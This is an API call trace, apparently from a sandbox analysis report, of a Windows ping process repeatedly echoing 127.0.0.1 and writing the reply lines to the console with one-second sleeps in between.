[0054.597] Sleep (dwMilliseconds=0x3e8) [0055.607] IcmpSendEcho2Ex (in: IcmpHandle=0xfb6bb8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xfbc340, RequestSize=0x20, RequestOptions=0xf3f074, ReplyBuffer=0xfc5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xfc5270) returned 0x1 [0055.607] InetNtopW (in: Family=2, pAddr=0xf3f064, pStringBuf=0xf3f18c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0055.608] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛔\x94䰨盪✣") returned 0x16 [0055.608] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0055.608] _fileno (_File=0x76ea4c28) returned 1 [0055.608] _get_osfhandle (_FileHandle=1) returned 0x28 [0055.608] GetFileType (hFile=0x28) returned 0x2 [0055.608] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0055.608] GetLastError () returned 0x6 [0055.608] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✣") returned 0x0 [0055.608] _fileno (_File=0x76ea4c28) returned 1 [0055.608] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0055.608] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0055.608] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xfc8360 [0055.608] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xfc8360, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0055.608] _fileno (_File=0x76ea4c28) returned 1 [0055.608] _write (in: _FileHandle=1, _Buf=0xfc8360*, _MaxCharCount=0x16 | out: _Buf=0xfc8360*) returned 22 [0055.608] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0055.608] _fileno (_File=0x76ea4c28) returned 1 [0055.608] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0055.608] LocalFree (hMem=0xfc8360) returned 0x0 [0055.608] LocalFree (hMem=0xfc7fa0) returned 0x0 [0055.608] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="菠ü杻ó⛿\x94䰨盪✼") returned 0x9 [0055.608] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0055.608] _fileno (_File=0x76ea4c28) returned 1 [0055.608] _get_osfhandle (_FileHandle=1) returned 0x28 [0055.608] GetFileType (hFile=0x28) returned 0x2 [0055.608] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0055.608] GetLastError () returned 0x6 [0055.608] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✼") returned 0x0 [0055.608] _fileno (_File=0x76ea4c28) returned 1 [0055.608] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0055.608] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0055.608] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a18 [0055.608] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xfb8a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0055.608] _fileno (_File=0x76ea4c28) returned 1 [0055.608] _write (in: _FileHandle=1, _Buf=0xfb8a18*, _MaxCharCount=0x9 | out: _Buf=0xfb8a18*) returned 9 [0055.608] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0055.608] _fileno (_File=0x76ea4c28) returned 1 [0055.608] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0055.608] LocalFree (hMem=0xfb8a18) returned 0x0 [0055.608] LocalFree (hMem=0xfc83e0) returned 0x0 [0055.608] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xf3effc, nSize=0x0, Arguments=0xf3eff8 | out: lpBuffer="菠ü杻ó➷\x94䰨盪✧") returned 0x9 [0055.608] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0055.608] _fileno (_File=0x76ea4c28) returned 1 [0055.608] _get_osfhandle (_FileHandle=1) returned 0x28 [0055.608] GetFileType (hFile=0x28) returned 0x2 [0055.608] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efc0 | out: lpMode=0xf3efc0) returned 0 [0055.608] GetLastError () returned 0x6 [0055.608] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef24, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0055.608] _fileno (_File=0x76ea4c28) returned 1 [0055.608] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0055.609] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0055.609] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a18 [0055.609] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xfb8a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0055.609] _fileno (_File=0x76ea4c28) returned 1 [0055.609] _write (in: _FileHandle=1, _Buf=0xfb8a18*, _MaxCharCount=0x9 | out: _Buf=0xfb8a18*) returned 9 [0055.609] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0055.609] _fileno (_File=0x76ea4c28) returned 1 [0055.609] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0055.609] LocalFree (hMem=0xfb8a18) returned 0x0 [0055.609] LocalFree (hMem=0xfc83e0) returned 0x0 [0055.609] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="菠ü杻ó⟘\x94䰨盪✨") returned 0x9 [0055.609] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0055.609] _fileno (_File=0x76ea4c28) returned 1 [0055.609] _get_osfhandle (_FileHandle=1) returned 0x28 [0055.609] GetFileType (hFile=0x28) returned 0x2 [0055.609] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0055.609] GetLastError () returned 0x6 [0055.609] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✨") returned 0x0 [0055.609] _fileno (_File=0x76ea4c28) returned 1 [0055.609] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0055.609] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0055.609] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8970 [0055.609] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xfb8970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0055.609] _fileno (_File=0x76ea4c28) returned 1 [0055.609] _write (in: _FileHandle=1, _Buf=0xfb8970*, _MaxCharCount=0x9 | out: _Buf=0xfb8970*) returned 9 [0055.609] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0055.609] _fileno (_File=0x76ea4c28) returned 1 [0055.609] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0055.609] LocalFree (hMem=0xfb8970) returned 0x0 [0055.609] LocalFree (hMem=0xfc83e0) returned 0x0 [0055.609] Sleep (dwMilliseconds=0x3e8) [0056.622] IcmpSendEcho2Ex (in: IcmpHandle=0xfb6bb8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xfbc340, RequestSize=0x20, RequestOptions=0xf3f074, ReplyBuffer=0xfc5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xfc5270) returned 0x1 [0056.623] InetNtopW (in: Family=2, pAddr=0xf3f064, pStringBuf=0xf3f18c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0056.623] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛔\x94䰨盪✣") returned 0x16 [0056.623] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0056.623] _fileno (_File=0x76ea4c28) returned 1 [0056.623] _get_osfhandle (_FileHandle=1) returned 0x28 [0056.623] GetFileType (hFile=0x28) returned 0x2 [0056.623] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0056.623] GetLastError () returned 0x6 [0056.623] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✣") returned 0x0 [0056.623] _fileno (_File=0x76ea4c28) returned 1 [0056.623] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0056.623] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0056.623] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xfc82a0 [0056.623] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xfc82a0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0056.623] _fileno (_File=0x76ea4c28) returned 1 [0056.623] _write (in: _FileHandle=1, _Buf=0xfc82a0*, _MaxCharCount=0x16 | out: _Buf=0xfc82a0*) returned 22 [0056.624] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0056.624] _fileno (_File=0x76ea4c28) returned 1 [0056.624] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0056.624] LocalFree (hMem=0xfc82a0) returned 0x0 [0056.624] LocalFree (hMem=0xfc7fa0) returned 0x0 [0056.624] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="菠ü杻ó⛿\x94䰨盪✼") returned 0x9 [0056.624] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0056.624] _fileno (_File=0x76ea4c28) returned 1 [0056.624] _get_osfhandle (_FileHandle=1) returned 0x28 [0056.624] GetFileType (hFile=0x28) returned 0x2 [0056.624] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0056.624] GetLastError () returned 0x6 [0056.624] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✼") returned 0x0 [0056.624] _fileno (_File=0x76ea4c28) returned 1 [0056.624] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0056.624] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0056.624] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb89a0 [0056.624] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xfb89a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0056.624] _fileno (_File=0x76ea4c28) returned 1 [0056.624] _write (in: _FileHandle=1, _Buf=0xfb89a0*, _MaxCharCount=0x9 | out: _Buf=0xfb89a0*) returned 9 [0056.624] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0056.624] _fileno (_File=0x76ea4c28) returned 1 [0056.624] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0056.624] LocalFree (hMem=0xfb89a0) returned 0x0 [0056.624] LocalFree (hMem=0xfc83e0) returned 0x0 [0056.624] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xf3effc, nSize=0x0, Arguments=0xf3eff8 | out: lpBuffer="菠ü杻ó➷\x94䰨盪✧") returned 0x9 [0056.624] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0056.624] _fileno (_File=0x76ea4c28) returned 1 [0056.624] _get_osfhandle (_FileHandle=1) returned 0x28 [0056.624] GetFileType (hFile=0x28) returned 0x2 [0056.624] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efc0 | out: lpMode=0xf3efc0) returned 0 [0056.624] GetLastError () returned 0x6 [0056.624] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef24, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0056.624] _fileno (_File=0x76ea4c28) returned 1 [0056.624] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0056.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0056.625] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb89a0 [0056.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xfb89a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0056.625] _fileno (_File=0x76ea4c28) returned 1 [0056.625] _write (in: _FileHandle=1, _Buf=0xfb89a0*, _MaxCharCount=0x9 | out: _Buf=0xfb89a0*) returned 9 [0056.625] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0056.625] _fileno (_File=0x76ea4c28) returned 1 [0056.625] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0056.625] LocalFree (hMem=0xfb89a0) returned 0x0 [0056.625] LocalFree (hMem=0xfc83e0) returned 0x0 [0056.625] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="菠ü杻ó⟘\x94䰨盪✨") returned 0x9 [0056.625] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0056.625] _fileno (_File=0x76ea4c28) returned 1 [0056.625] _get_osfhandle (_FileHandle=1) returned 0x28 [0056.625] GetFileType (hFile=0x28) returned 0x2 [0056.625] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0056.625] GetLastError () returned 0x6 [0056.625] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✨") returned 0x0 [0056.625] _fileno (_File=0x76ea4c28) returned 1 [0056.625] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0056.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0056.625] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a18 [0056.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xfb8a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0056.625] _fileno (_File=0x76ea4c28) returned 1 [0056.625] _write (in: _FileHandle=1, _Buf=0xfb8a18*, _MaxCharCount=0x9 | out: _Buf=0xfb8a18*) returned 9 [0056.625] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0056.625] _fileno (_File=0x76ea4c28) returned 1 [0056.625] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0056.625] LocalFree (hMem=0xfb8a18) returned 0x0 [0056.625] LocalFree (hMem=0xfc83e0) returned 0x0 [0056.625] Sleep (dwMilliseconds=0x3e8) [0057.637] IcmpSendEcho2Ex (in: IcmpHandle=0xfb6bb8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xfbc340, RequestSize=0x20, RequestOptions=0xf3f074, ReplyBuffer=0xfc5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xfc5270) returned 0x1 [0057.638] InetNtopW (in: Family=2, pAddr=0xf3f064, pStringBuf=0xf3f18c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0057.638] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="羠ü杻ó⛔\x94䰨盪✣") returned 0x16 [0057.638] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0057.638] _fileno (_File=0x76ea4c28) returned 1 [0057.638] _get_osfhandle (_FileHandle=1) returned 0x28 [0057.638] GetFileType (hFile=0x28) returned 0x2 [0057.638] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0057.638] GetLastError () returned 0x6 [0057.638] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✣") returned 0x0 [0057.638] _fileno (_File=0x76ea4c28) returned 1 [0057.638] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0057.638] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0057.638] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xfc82a0 [0057.639] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xfc82a0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0057.639] _fileno (_File=0x76ea4c28) returned 1 [0057.639] _write (in: _FileHandle=1, _Buf=0xfc82a0*, _MaxCharCount=0x16 | out: _Buf=0xfc82a0*) returned 22 [0057.639] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0057.639] _fileno (_File=0x76ea4c28) returned 1 [0057.639] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0057.639] LocalFree (hMem=0xfc82a0) returned 0x0 [0057.639] LocalFree (hMem=0xfc7fa0) returned 0x0 [0057.639] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="菠ü杻ó⛿\x94䰨盪✼") returned 0x9 [0057.639] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0057.639] _fileno (_File=0x76ea4c28) returned 1 [0057.639] _get_osfhandle (_FileHandle=1) returned 0x28 [0057.639] GetFileType (hFile=0x28) returned 0x2 [0057.639] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0057.639] GetLastError () returned 0x6 [0057.639] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✼") returned 0x0 [0057.639] _fileno (_File=0x76ea4c28) returned 1 [0057.639] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0057.639] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0057.639] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8940 [0057.639] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xfb8940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0057.639] _fileno (_File=0x76ea4c28) returned 1 [0057.639] _write (in: _FileHandle=1, _Buf=0xfb8940*, _MaxCharCount=0x9 | out: _Buf=0xfb8940*) returned 9 [0057.639] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0057.639] _fileno (_File=0x76ea4c28) returned 1 [0057.639] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0057.639] LocalFree (hMem=0xfb8940) returned 0x0 [0057.639] LocalFree (hMem=0xfc83e0) returned 0x0 [0057.639] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xf3effc, nSize=0x0, Arguments=0xf3eff8 | out: lpBuffer="菠ü杻ó➷\x94䰨盪✧") returned 0x9 [0057.639] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0057.639] _fileno (_File=0x76ea4c28) returned 1 [0057.639] _get_osfhandle (_FileHandle=1) returned 0x28 [0057.639] GetFileType (hFile=0x28) returned 0x2 [0057.639] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efc0 | out: lpMode=0xf3efc0) returned 0 [0057.639] GetLastError () returned 0x6 [0057.639] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef24, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0057.639] _fileno (_File=0x76ea4c28) returned 1 [0057.639] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0057.639] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0057.639] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8970 [0057.639] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xfb8970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0057.639] _fileno (_File=0x76ea4c28) returned 1 [0057.639] _write (in: _FileHandle=1, _Buf=0xfb8970*, _MaxCharCount=0x9 | out: _Buf=0xfb8970*) returned 9 [0057.639] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0057.639] _fileno (_File=0x76ea4c28) returned 1 [0057.640] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0057.640] LocalFree (hMem=0xfb8970) returned 0x0 [0057.640] LocalFree (hMem=0xfc83e0) returned 0x0 [0057.640] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xf3eff8, nSize=0x0, Arguments=0xf3eff4 | out: lpBuffer="菠ü杻ó⟘\x94䰨盪✨") returned 0x9 [0057.640] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0057.640] _fileno (_File=0x76ea4c28) returned 1 [0057.640] _get_osfhandle (_FileHandle=1) returned 0x28 [0057.640] GetFileType (hFile=0x28) returned 0x2 [0057.640] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3efbc | out: lpMode=0xf3efbc) returned 0 [0057.640] GetLastError () returned 0x6 [0057.640] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ef20, nSize=0x50 | out: lpBuffer="ó✨") returned 0x0 [0057.640] _fileno (_File=0x76ea4c28) returned 1 [0057.640] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0057.640] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0057.640] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xfb8a18 [0057.640] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xfb8a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0057.640] _fileno (_File=0x76ea4c28) returned 1 [0057.640] _write (in: _FileHandle=1, _Buf=0xfb8a18*, _MaxCharCount=0x9 | out: _Buf=0xfb8a18*) returned 9 [0057.640] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0057.640] _fileno (_File=0x76ea4c28) returned 1 [0057.640] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0057.640] LocalFree (hMem=0xfb8a18) returned 0x0 [0057.640] LocalFree (hMem=0xfc83e0) returned 0x0 [0057.640] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xf3ef80, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0057.640] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xf3ef54, nSize=0x0, Arguments=0xf3ef50 | out: lpBuffer="菠üó᧰\x94䰨盪❏") returned 0x5e [0057.640] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0057.640] _fileno (_File=0x76ea4c28) returned 1 [0057.640] _get_osfhandle (_FileHandle=1) returned 0x28 [0057.640] GetFileType (hFile=0x28) returned 0x2 [0057.640] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf3ef18 | out: lpMode=0xf3ef18) returned 0 [0057.640] GetLastError () returned 0x6 [0057.640] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf3ee7c, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0057.640] _fileno (_File=0x76ea4c28) returned 1 [0057.640] _setmode (_FileHandle=1, _Mode=32768) returned 16384 